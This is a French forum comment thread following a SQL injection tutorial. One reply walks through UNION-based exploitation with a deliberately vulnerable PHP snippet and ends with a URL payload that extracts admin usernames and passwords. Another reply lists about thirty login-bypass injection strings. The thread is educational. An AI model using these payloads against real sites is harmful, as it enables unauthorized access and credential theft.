Comment exploiter une faille SQL Injection

[AntoLeNice]

humm, si les injections SQL ne fonctionne pas, tout se que je vois, c'est que si le site utilise des cookies, tu peux essayer de les modifier pour changer la connexion au site. Sinon, je vois pas trop, Cyber pourrait peut-être en dire plus.

[mercurial17]

Merci ! Je ne connais pas très bien le PHP et pourtant j'ai compris tout ton tuto, c'est super bien expliqué. Par contre j'ai une question : Il me semble que cette faille est très connue donc je voulais savoir s'il existait encore des sites qui présentaient cette faille ?

[Adns]

Bonjour,

L'article est plutôt clair et précis
Si je peux me permettre quelques remarques

Prenons exemple sur un formulaire d’authentification, puisque c’est là que ce genre d’exploitation est la plus intéressante.

Il y a aussi une autre grosse utilisation de ce genre de faille. C'est de pouvoir afficher des données qui ne nous sont pas accessibles.

Je suis sur que toute personne ayant déjà regardé de plus près une URL a déjà vu ce genre de chose :

Code :

http://site.com/article.php?id=255

Et bien ici aussi il existe une potentielle faille.

Voyons un code vulnérable et assez simpliste:

Code PHP :

<?php
    
    $id = $_GET['id'];
    $res = mysql_query("select titre, contenu from article where id='".$id."'");
    $row = mysql_fetch_array($res);
    
    echo "<h2>".$row['titre']."</h2>";
    
    echo "<p>".$row['contenu']."</p>";
    
?>

Ce code devrait parfaitement fonctionner jusqu'à ce qu'un petit malin vienne jouer avec la variable $id qui n'est pas sécurisé.

Pour vérifier que faille il y a il suffit de tester le caractère ' a la fin du chiffre qui représente l'id de l'article.

Exemple :

Code :

http://site.com/article.php?id=255'

Si une erreur se produit lors de l'affichage de la page cela signifie que la faille existe. il ne reste plus qu'à l'exploiter.

Pour cela il faut jouer avec un mot clé de SQL qui est UNION ALL.
Dans une requête SQL UNION ALL permet d'obtenir toutes les données de plusieurs tables.

La première étape lors de ce genre d'exploitation consiste à "brute-forcer" pour connaitre le nombre de champ utilisé dans la requête à modifier.

select titre, contenu from article

Ici je pars du principe que la faille se trouve sur un CMS et donc que l'on a accès à la structure de la table. Lorsque ce n'est pas le cas il existe différentes manières pour les obtenir...

Revenons en à notre brute-force et passons à la pratique.

Code :

Test 1 : http://site.com/article.php?id=0' union all select 1 from article --

Explications :

• l'apostrophe permet de fermer la chaine de caractère et ainsi injecter notre code.
  
• UNION ALL permettra d'afficher les données d'une autre table.
  
• -- permet de mettre la suite de la requête en commentaire pour qu'elle ne soit pas exécutée.
  
• le fait de mettre un 0 comme ID permettra d'afficher uniquement les données de l'autre table et non les données relative à un article existant.
  

Cette requête nous renverra une erreur car la requête initiale utilise 2 champs : Titre et contenu.

Code :

Test 2 : http://site.com/article.php?id=0' union all select 1,2 from article --

Bingo !!
Cette requête affichera dans la page 1 à la place du titre et 2 à la place du contenu
Dans ce cas là ce fut plutôt rapide car il n'y avait que 2 champs, mais cela peut-être beaucoup plus long s'il y a plus de champs.


Une fois arrivé ici il suffit de remplacer les 1 et 2 par les données sensibles qui nous intéressent comme les identifiants de connexion d'un admin

Exemple :

Code :

http://site.com/article.php?id=0' union all select user,password from users --

En espérant avoir été clair

Adns

[Luxerails]

Il me semble que cette faille est très connue donc je voulais savoir s"il existait encore des sites qui présentaient cette faille ?

Je dirais que les injections SQL réprésentent 90% des failles web

[mercurial17]

ah tant que ça ?! merci d'avoir répondu

[ThibauT]

Bravo pour ton tutoriel qui explique une faille pas si facile que ça à exploiter, de manière très ludique. D'autant plus que cette faille est très présente.

[load@data]

Merci, Mais il faut savoir que le serveur side, peut reconnêtre une requête corrompue et d'autre non donc je vous laisse avec un petit choixde scripts à injecter dans le champs :

') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1

Ceci sont les plus connues !

Load,

[LeuhVa]

Plop !
J'ai up un article de Nikoskoda(hzv) qui offre un autre tour d'horizon sur les sql !
ça vaut l'coup d'oeil !
c'est là !

[ark]

Merci LeuhVa pour le partage, ça a l'air vraiment complet comme article :)

[WizOut]

J'ai un autre article enfin post pour compléter le tous pour bypass les sécurités

http://top-hat-sec.com/forum/index.php?topic=2049.0

[Ambrosios]

Merci CyberSee, encore un super tuto
J'utilise PDO avec des fonctions prepare() et execute() pour gérer les variables. Ce risque d'injection SQL est-il toujours présent ?

[gruik]

oui les injections sql ça existe toujours et ça marche bien, attention au déterrage de topic, le dernier post date de +1.5 an tout de même (et on a pas revu CyberSee depuis près d'un an accessoirement)

[CyberSee]

"coucou" accessoirement lol
Au risque de me répéter, la règle du déterrage de topic ne s'applique pas à la zone des tutos ;-)

[gruik]

"coucou lol"
hésite pas à écumer tous les topics du siècle dernier surtout, c'est super utile

[CyberSee]

C'est "utile" dans l'optique que le dernier message posté ne soit pas un découragement pour les questions sur ce tuto où n'importe quel autre enfaite ;-)